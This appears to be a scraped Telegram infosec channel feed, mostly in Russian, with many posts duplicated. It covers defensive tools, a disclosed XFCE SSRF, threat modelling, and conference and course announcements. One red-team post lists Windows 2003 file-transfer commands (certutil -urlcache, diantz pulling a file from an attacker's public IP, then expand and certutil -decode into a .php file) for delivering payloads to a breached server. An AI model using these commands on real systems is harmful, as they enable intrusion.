Forwarded from APT
🦮 BlueHound
It is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network
It is a fork of NeoDash, reimagined, to make it suitable for defensive security purposes.
Blog:
🔗 https://zeronetworks.com/blog/bluehound-community-driven-resilience/
Tool:
🔗 https://github.com/zeronetworks/BlueHound
#ad #sharphound #blueteam
It is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network
It is a fork of NeoDash, reimagined, to make it suitable for defensive security purposes.
Blog:
🔗 https://zeronetworks.com/blog/bluehound-community-driven-resilience/
Tool:
🔗 https://github.com/zeronetworks/BlueHound
#ad #sharphound #blueteam
Forwarded from PT SWARM
🙀 Our researcher Arseniy Sharoglazov found a new technique for discovering second-level domains!
Useful for:
🐞 Bughunters, for discovering vulns on new domains
🐛 Threathunters, for discovering malicious domains
🎃 Everyone else
Read the research: https://swarm.ptsecurity.com/discovering-domains-via-timing-attack/
Useful for:
🐞 Bughunters, for discovering vulns on new domains
🐛 Threathunters, for discovering malicious domains
🎃 Everyone else
Read the research: https://swarm.ptsecurity.com/discovering-domains-via-timing-attack/
PT SWARM
Discovering Domains via a Time-Correlation Attack on Certificate Transparency
New attack on certificate transparency reveals previously unknown domains!
Forwarded from k8s (in)security (Дмитрий Евдокимов)
Тема сегодняшнего поста это Threat Modeling для Kubernetes методом STRIDE (
Занимался кто?)
Думаю если и да, то совсем мало кто ... Ведь сидеть разбираться в этом, закапываться в какие-то бумаги мало кто из нас хочет.
Но, одни добрые ребята, взяли и позволили это дело значительно упростить!
В итоге процесс выглядит следующим образом:
1) Скачиваем Microsoft Threat Modeling Tool (MS-TMT)
2) Скачиваем шаблон для этой
3) Начинаем из разных предоставленных субъектов и объектов рисовать в
4) Далее система сама эта проанализирует и сгенерирует отчет с обнаруженными угрозами по
5) Занимаемся анализом угроз в
Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege).Занимался кто?)
Думаю если и да, то совсем мало кто ... Ведь сидеть разбираться в этом, закапываться в какие-то бумаги мало кто из нас хочет.
Но, одни добрые ребята, взяли и позволили это дело значительно упростить!
В итоге процесс выглядит следующим образом:
1) Скачиваем Microsoft Threat Modeling Tool (MS-TMT)
2) Скачиваем шаблон для этой
MS-TMT для поддержки k8s (его как раз ребята и написали и выложили в открытый доступ)3) Начинаем из разных предоставленных субъектов и объектов рисовать в
MS-TMT свою диаграмму взаимодействий между разными ними и обозначать границы доверия (а может у вас ZeroTrust).4) Далее система сама эта проанализирует и сгенерирует отчет с обнаруженными угрозами по
STRIDE.5) Занимаемся анализом угроз в
MS-TMT - отмечаем как: требует исследования, не применима или уже имеет тако-то митигейшен.Forwarded from Sys-Admin InfoSec
Open SysConf 2022 Уже в Октябре!
Привет, мы готовим новую - четвертую ежегодную встречу Open SysConf'22.
Уже точно есть:
— Три доклада
— Собрано половина бюджета
— Место, дата и время встречи
- Обновленный сайт sysconf.io
Обычно у большинства людей обстоятельства складываются таким образом, что вечно что-то мешает заняться спортом, сделать доклад, поучаствовать в конфе, мешают обычно работа, откладывание за завтра и тп и тд...
Собраться, поделиться знаниями, найти время для себя - это то, что нужно действительно сделать здесь и сейчас (и в Октябре)! Расправь плечи дорогой друг, подними голову и ступай смело вперед:
- https://sysconf.io
- 14 Октября, с 11:00 до 20:00, Алматы.
Зал большой, места хватит всем! Все нужные ссылки, ты найдешь на сайте. Peace ✌️.
Привет, мы готовим новую - четвертую ежегодную встречу Open SysConf'22.
Уже точно есть:
— Три доклада
— Собрано половина бюджета
— Место, дата и время встречи
- Обновленный сайт sysconf.io
Обычно у большинства людей обстоятельства складываются таким образом, что вечно что-то мешает заняться спортом, сделать доклад, поучаствовать в конфе, мешают обычно работа, откладывание за завтра и тп и тд...
Собраться, поделиться знаниями, найти время для себя - это то, что нужно действительно сделать здесь и сейчас (и в Октябре)! Расправь плечи дорогой друг, подними голову и ступай смело вперед:
- https://sysconf.io
- 14 Октября, с 11:00 до 20:00, Алматы.
Зал большой, места хватит всем! Все нужные ссылки, ты найдешь на сайте. Peace ✌️.
Fracture - Velocity EP
Label - 1985 Music - ONEF027 - 29 jan 2021
https://www.1985.co.uk/collections/music
https://1985-music.bandcamp.com/releases
https://www.beatport.com/label/1985-music/558
Label - 1985 Music - ONEF027 - 29 jan 2021
https://www.1985.co.uk/collections/music
https://1985-music.bandcamp.com/releases
https://www.beatport.com/label/1985-music/558
Forwarded from One brick to the IT world
Обнаружил SSRF-уязвимость в плагине Tumbler для XFCE, которая работает по умолчанию. Если кратко, суть в том, что при открытии директории с m3u8-файлом с расширением .mp4 (работает и для .mp3, .avi, .mpg, etc.) можно отправлять любой GET-запрос на любой сервер.
Работает в последней версии Kali Linux, Debian XFCE, и скорее всего в любом другом дистрибутиве Linux с XFCE на борту. Но большую опасность, наверное, несет для Kali Linux, пользователи которого локально тестируют уязвимые приложения типа DVWA, и одного запроса может хватить для компрометации компьютера.
Патч и исправленная версия уже выпущены.
Подробности на моем блоге:
https://murat.one/?p=187
#ssrf #xfce #kali #debian
Работает в последней версии Kali Linux, Debian XFCE, и скорее всего в любом другом дистрибутиве Linux с XFCE на борту. Но большую опасность, наверное, несет для Kali Linux, пользователи которого локально тестируют уязвимые приложения типа DVWA, и одного запроса может хватить для компрометации компьютера.
Патч и исправленная версия уже выпущены.
Подробности на моем блоге:
https://murat.one/?p=187
#ssrf #xfce #kali #debian
👍3
Новый курс Red Team Operator II продолжение #CRTO от Zeropointsecurity предлагает окунуться с головой в продвинутые тактики OPSEC:
- C2 Infrastructure
- Windows APIs
- Proccess Injection
- Defense Evasion
- Attack Surface Reduction
- Windows Defender Application Control
- EDR Evasion
https://training.zeropointsecurity.co.uk/courses/red-team-ops-ii
- C2 Infrastructure
- Windows APIs
- Proccess Injection
- Defense Evasion
- Attack Surface Reduction
- Windows Defender Application Control
- EDR Evasion
https://training.zeropointsecurity.co.uk/courses/red-team-ops-ii
Zero-Point Security
Red Team Ops II
Defence Evasion Tactics.
👍2
Распродажа курсов от TheCyberMentor TCM Academy!
Сегодня последний день чтобы успеть купить курс по анализу малвари за 1$. Лично я прикупил! 😉
Expires 1am EDT on 8/22:
Code ILOVEMYVIEWERS - $6
Web Application Security & Penetration Testing (https://academy.tcm-sec.com/p/practical-web-application-security-and-testing)
Expires 11:59pm EDT on 8/22:
Code DOLLARANDADREAM - $1
Practical Malware Analysis & Triage - (https://academy.tcm-sec.com/p/practical-malware-analysis-triage)
Practical Ethical Hacking - (https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)
Linux101 - (https://academy.tcm-sec.com/p/linux-101)
Code WICYS - $6
Mobile Application Penetration Testing (https://academy.tcm-sec.com/p/mobile-application-penetration-testing) - $1 from each sale of this course goes to Women in CyberSecurity (WiCyS)
Expires 11:59pm EDT on 8/28:
Code OK_FINE_I_WILL_TOO - $1
Movement, Pivoting, & Persistence (https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers)
Сегодня последний день чтобы успеть купить курс по анализу малвари за 1$. Лично я прикупил! 😉
Expires 1am EDT on 8/22:
Code ILOVEMYVIEWERS - $6
Web Application Security & Penetration Testing (https://academy.tcm-sec.com/p/practical-web-application-security-and-testing)
Expires 11:59pm EDT on 8/22:
Code DOLLARANDADREAM - $1
Practical Malware Analysis & Triage - (https://academy.tcm-sec.com/p/practical-malware-analysis-triage)
Practical Ethical Hacking - (https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course)
Linux101 - (https://academy.tcm-sec.com/p/linux-101)
Code WICYS - $6
Mobile Application Penetration Testing (https://academy.tcm-sec.com/p/mobile-application-penetration-testing) - $1 from each sale of this course goes to Women in CyberSecurity (WiCyS)
Expires 11:59pm EDT on 8/28:
Code OK_FINE_I_WILL_TOO - $1
Movement, Pivoting, & Persistence (https://academy.tcm-sec.com/p/movement-pivoting-and-persistence-for-pentesters-and-ethical-hackers)
Tcm-Sec
TCM Security Academy
TCM Security Academy offers practical, job-focused cybersecurity training designed by industry-leading instructors that doesn't break the bank.
👍5
Forwarded from YAH (Egor Bogomolov)
Онлайн митап!
Сегодня стартовал первый митап The Standoff Talks, на котором собрались энтузиасты и профессионалы offensive и defensive security.
Программа на сегодня такая:
12:10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
13:20 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
14:15 Константин Полишин — RedTeam страдания SOC'а
16:10 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
16:55 Вадим Шелест и Михаил Дрягунов — Breaking Red
18:20 Илья Шапошников — MSSQL: dump linked passwords
19:10 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco
Смотреть прямую трансляцию
Сегодня стартовал первый митап The Standoff Talks, на котором собрались энтузиасты и профессионалы offensive и defensive security.
Программа на сегодня такая:
12:10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff
13:20 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов
14:15 Константин Полишин — RedTeam страдания SOC'а
16:10 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить
16:55 Вадим Шелест и Михаил Дрягунов — Breaking Red
18:20 Илья Шапошников — MSSQL: dump linked passwords
19:10 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco
Смотреть прямую трансляцию
YouTube
The Standoff Talks
Митап для энтузиастов и профессионалов Offensive/Defensive Security.
Программа
11.00 Интро от организаторов
11.20 Виктор Зварыкин — Не делайте так, как мы
12.10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff…
Программа
11.00 Интро от организаторов
11.20 Виктор Зварыкин — Не делайте так, как мы
12.10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff…
#windows2003 #redteam #transferfiles #T1105
Если вы вдруг оказались на старом пыльном Windows 2003ем сервере и нужно доставить туда файлы, есть способы:
Bitsadmin и powershell тут тоже нет.
Есть вариант использовать встроенную утилиту diantz.exe
Далее нам нужно распаковать полученный файл
Утилита certutil может пригодиться для encode/decode:
Если вы вдруг оказались на старом пыльном Windows 2003ем сервере и нужно доставить туда файлы, есть способы:
certutil -urlcache -split -f URL file- работать не будет из за версии приложения
Bitsadmin и powershell тут тоже нет.
Есть вариант использовать встроенную утилиту diantz.exe
diantz.exe \\YOURPUBLICIP\file.exe c:\destinationFolder\target.cab
Далее нам нужно распаковать полученный файл
expand target.cab agent.exe
Утилита certutil может пригодиться для encode/decode:
certutil -decode target.cab target.php
👍4
Forwarded from Zhovner Hub
Топовый обзор Флиппера на Итальянском. Я почти ни слова не пониманию. Чувак вскрыл сейф, сбрутил ворота CAME и вообще выжимает максимум из устройства
https://www.youtube.com/watch?v=YeGAqnU9zeE
https://www.youtube.com/watch?v=YeGAqnU9zeE
YouTube
HO COMPRATO UNA FIGATA DA DEGLI H4CKER RUSS1 🏴☠️⚠️
Acquisto: https://amzn.to/3GXgPWW
Modulo Wifi: https://amzn.to/458DnPz
Registrati, scopri il token YNG e ricevi fino a 25 euro bonus su Young Platform: https://link.youngplatform.com/r/otto
Scarica Step e guadagna subito la tua prima criptovaluta YNG con…
Modulo Wifi: https://amzn.to/458DnPz
Registrati, scopri il token YNG e ricevi fino a 25 euro bonus su Young Platform: https://link.youngplatform.com/r/otto
Scarica Step e guadagna subito la tua prima criptovaluta YNG con…